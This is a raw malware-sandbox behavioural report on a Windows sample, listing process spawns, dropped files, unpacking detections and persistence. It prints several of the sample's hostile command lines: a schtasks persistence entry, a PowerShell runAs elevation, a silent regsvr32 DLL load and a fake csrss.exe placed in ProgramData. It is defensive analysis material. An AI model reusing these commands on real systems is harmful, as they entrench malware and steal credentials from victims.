Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\81F7.exe C:\Users\user\AppData\Local\Temp\81F7.exe
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Process created: C:\Users\user\AppData\Local\Temp\81F7.exe C:\Users\user\AppData\Local\Temp\81F7.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8BAD.exe C:\Users\user\AppData\Local\Temp\8BAD.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\98EC.exe C:\Users\user\AppData\Local\Temp\98EC.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9E0E.exe C:\Users\user\AppData\Local\Temp\9E0E.exe
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\9E0E.exe "C:\Users\user\AppData\Local\Temp\9E0E.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\AF26.exe C:\Users\user\AppData\Local\Temp\AF26.exe
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Source: C:\Users\user\AppData\Local\Temp\FourthX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C53F.exe C:\Users\user\AppData\Local\Temp\C53F.exe
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D0F8.exe C:\Users\user\AppData\Local\Temp\D0F8.exe
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	Process created: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp "C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp" /SL5="$10476,4502673,54272,C:\Users\user\AppData\Local\Temp\D0F8.exe"
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Process created: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\consent.exe consent.exe 6016 414 0000022C4F022750
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E4FE.exe C:\Users\user\AppData\Local\Temp\E4FE.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
Source: C:\Users\user\AppData\Local\Temp\E4FE.exe	Process created: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp "C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp" /SL5="$204C4,4502673,54272,C:\Users\user\AppData\Local\Temp\E4FE.exe"
Source: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Process created: C:\Users\user\AppData\Local\Temp\D0F8.exe "C:\Users\user\AppData\Local\Temp\D0F8.exe" /SPAWNWND=$1048C /NOTIFYWND=$10476
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	Process created: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp "C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp" /SL5="$104D4,4502673,54272,C:\Users\user\AppData\Local\Temp\D0F8.exe" /SPAWNWND=$1048C /NOTIFYWND=$10476
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\7DFF.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\81F7.exe C:\Users\user\AppData\Local\Temp\81F7.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8BAD.exe C:\Users\user\AppData\Local\Temp\8BAD.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\98EC.exe C:\Users\user\AppData\Local\Temp\98EC.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\9E0E.exe C:\Users\user\AppData\Local\Temp\9E0E.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\AF26.exe C:\Users\user\AppData\Local\Temp\AF26.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C53F.exe C:\Users\user\AppData\Local\Temp\C53F.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D0F8.exe C:\Users\user\AppData\Local\Temp\D0F8.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\E4FE.exe C:\Users\user\AppData\Local\Temp\E4FE.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\7DFF.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Process created: C:\Users\user\AppData\Local\Temp\81F7.exe C:\Users\user\AppData\Local\Temp\81F7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	Process created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Process created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Process created: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp
Source: C:\Users\user\AppData\Local\Temp\FourthX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	Process created: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp "C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp" /SL5="$10476,4502673,54272,C:\Users\user\AppData\Local\Temp\D0F8.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
Source: C:\Users\user\AppData\Local\Temp\E4FE.exe	Process created: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp "C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp" /SL5="$204C4,4502673,54272,C:\Users\user\AppData\Local\Temp\E4FE.exe"
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	Process created: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp "C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp" /SL5="$104D4,4502673,54272,C:\Users\user\AppData\Local\Temp\D0F8.exe" /SPAWNWND=$1048C /NOTIFYWND=$10476

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe

Window found: window name: TButton

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Detected unpacking (changes PE section rights)

Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 8BAD.exe, 0000000B.00000002.2457464100.000000000536C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\wepibobupuwab.pdb source: 81F7.exe, 00000009.00000002.2370893903.00000000005CA000.00000002.00000001.01000000.00000009.sdmp, 81F7.exe, 00000009.00000000.2363837038.00000000005CA000.00000002.00000001.01000000.00000009.sdmp, 81F7.exe, 0000000A.00000000.2366840602.00000000005CA000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: IC:\wepibobupuwab.pdb$"] source: 81F7.exe, 00000009.00000002.2370893903.00000000005CA000.00000002.00000001.01000000.00000009.sdmp, 81F7.exe, 00000009.00000000.2363837038.00000000005CA000.00000002.00000001.01000000.00000009.sdmp, 81F7.exe, 0000000A.00000000.2366840602.00000000005CA000.00000002.00000001.01000000.00000009.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Unpacked PE file: 0.2.MCYq2AqNU0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ccjteug	Unpacked PE file: 6.2.ccjteug.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Unpacked PE file: 21.2.288c47bbc1871b439df19ff4df68f076.exe.400000.2.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Local\Temp\C53F.exe	Unpacked PE file: 28.2.C53F.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Unpacked PE file: 32.2.nsrD9BD.tmp.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Unpacked PE file: 21.2.288c47bbc1871b439df19ff4df68f076.exe.400000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Unpacked PE file: 32.2.nsrD9BD.tmp.400000.0.unpack

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\FourthX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
Source: C:\Users\user\AppData\Local\Temp\FourthX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs

Source: 8BAD.exe.2.dr

Static PE information: 0xE6CBDE54 [Sat Sep 13 05:00:04 2092 UTC]

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe

Code function: 0_2_0041B350 LoadLibraryW,GetProcAddress,VirtualProtect,

0_2_0041B350

Source: initial sample

Static PE information: section where entry point is pointing to: .&u&u

Source: 98EC.exe.2.dr	Static PE information: section name: .&u&u
Source: 98EC.exe.2.dr	Static PE information: section name: .&u&u
Source: 98EC.exe.2.dr	Static PE information: section name: .&u&u

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\7DFF.dll

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00403253 push eax; ret	0_2_0040332D
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00401C64 push es; retf	0_2_00401C83
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_0040332A push eax; ret	0_2_0040332D
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00402F91 push 60B44389h; retf	0_2_00402FAB
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00AA2FF8 push 60B44389h; retf	0_2_00AA3012
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00AA1CCB push es; retf	0_2_00AA1CEA
Source: C:\Users\user\Desktop\MCYq2AqNU0.exe	Code function: 0_2_00ACD7D4 pushad ; retf	0_2_00ACD7DD
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00403253 push eax; ret	6_2_0040332D
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00401C64 push es; retf	6_2_00401C83
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_0040332A push eax; ret	6_2_0040332D
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00402F91 push 60B44389h; retf	6_2_00402FAB
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00841CCB push es; retf	6_2_00841CEA
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_00842FF8 push 60B44389h; retf	6_2_00843012
Source: C:\Users\user\AppData\Roaming\ccjteug	Code function: 6_2_0087D754 push eax; retf	6_2_0087D755
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_046B106A push ebx; retf	8_2_046B1076
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_004044E9 push ecx; ret	9_2_004044FC
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0234C2EF push ebx; iretd	9_2_0234C2F7
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_023A070A pushad ; ret	9_2_023A070C
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_024067ED push ebp; retf	9_2_024067EE
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0243E7F8 push edx; retf	9_2_0243E7F9
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0240680A push 5A36841Dh; retf	9_2_02406825
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_0243E4BD push cs; ret	9_2_0243E4BE
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 9_2_02293DA3 push esi; retf	9_2_02293DA4
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	Code function: 10_2_00696299 push ecx; ret	10_2_006962AC
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1CCC2B push ecx; ret	11_2_6D1CCC3E
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1CD565 push ecx; ret	11_2_6D1CD578
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018C729D push ss; retf	12_3_018C729E
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018C9DAE pushfd ; retf	12_3_018C9DB0
Source: C:\Users\user\AppData\Local\Temp\98EC.exe	Code function: 12_3_018C955A push ebp; retf	12_3_018C9566

Source: MCYq2AqNU0.exe	Static PE information: section name: .text entropy: 7.322639038806439
Source: 7DFF.dll.2.dr	Static PE information: section name: .text entropy: 7.963456184487692
Source: 81F7.exe.2.dr	Static PE information: section name: .text entropy: 7.993767648771089
Source: C53F.exe.2.dr	Static PE information: section name: .text entropy: 7.31033640567279
Source: ccjteug.2.dr	Static PE information: section name: .text entropy: 7.322639038806439
Source: usjteug.2.dr	Static PE information: section name: .text entropy: 7.31033640567279
Source: csrss.exe.10.dr	Static PE information: section name: .text entropy: 7.993767648771089

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\AppData\Local\Temp\81F7.exe

File created: C:\ProgramData\Drivers\csrss.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\libiconv-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-KKEVI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\zlib1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\unins000.exe (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\usjteug	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\libgcc_s_dw2-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\libogg-0.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\libvorbisenc-2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_iscrypt.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ccjteug	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9E0E.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-M5JQ4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-CJI63.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\avutil-56.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-KL11C.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\SDL2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-VAQO3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-UD4UM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	File created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\81F7.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E4FE.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C53F.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\81F7.exe	File created: C:\ProgramData\Drivers\csrss.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	File created: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\syncUpd[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D0F8.exe	File created: C:\Users\user\AppData\Local\Temp\is-G4HEA.tmp\D0F8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E4FE.exe	File created: C:\Users\user\AppData\Local\Temp\is-3OOS1.tmp\E4FE.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-35RU5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\98EC.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\Temp\is-OLN1J.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	File created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\libvorbis-0.dll (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D0F8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-PC6U4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-836TM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	File created: C:\Users\user\AppData\Local\Temp\FourthX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	File created: C:\Users\user\AppData\Local\Temp\nsvCB06.tmp\INetC.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7DFF.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	File created: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-NARCG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-KCHS2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\swresample-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\AF26.exe	File created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe	File created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\AF26.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8BAD.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-I2BFP.tmp\D0F8.tmp	File created: C:\Users\user\AppData\Local\CD-ROM Emulator\is-VSFOK.tmp	Jump to dropped file
